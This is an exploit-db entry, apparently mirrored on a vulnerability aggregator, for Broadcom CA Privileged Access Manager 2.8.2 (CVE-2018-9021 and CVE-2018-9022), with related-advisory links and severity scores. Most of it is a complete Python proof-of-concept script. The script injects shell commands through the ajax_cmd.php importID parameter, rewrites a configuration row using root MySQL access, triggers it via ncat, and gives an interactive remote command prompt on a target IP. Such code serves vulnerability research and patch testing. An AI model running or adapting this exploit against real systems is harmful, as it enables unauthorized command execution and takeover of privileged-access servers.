Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution

Published: 05 Dec 2019 00:00:00
Reported by: Peter Lapp
Type: exploitdb
Source: www.exploit-db.com

Related

Reporter | Title | Published
0day.today | Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution Exploit #RCE | 5 Dec 2019 00:00
ATTACKERKB | CVE-2018-9022 | 18 Jun 2018 18:29
ATTACKERKB | CVE-2018-9021 | 18 Jun 2018 18:29
Circl | CVE-2018-9021 | 5 Dec 2019 00:00
Circl | CVE-2018-9022 | 5 Dec 2019 00:00
CNVD | CA Privileged Access Manager Authentication Bypass Vulnerability | 19 Jun 2018 00:00
Check Point Advisories | Broadcom CA Privileged Access Manager Remote Command Execution (CVE-2018-9021; CVE-2018-9022) | 8 Dec 2019 00:00
CVE | CVE-2018-9021 | 18 Jun 2018 18:00
CVE | CVE-2018-9022 | 18 Jun 2018 18:00

Code

# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value

def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd

def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)

def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''

    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'

    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)


if __name__ == "__main__":
    main()

Scores (current as of 05 Dec 2019 00:00)
Risk: 9.8 (High)
Vulners AI Score: 9.8
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.19943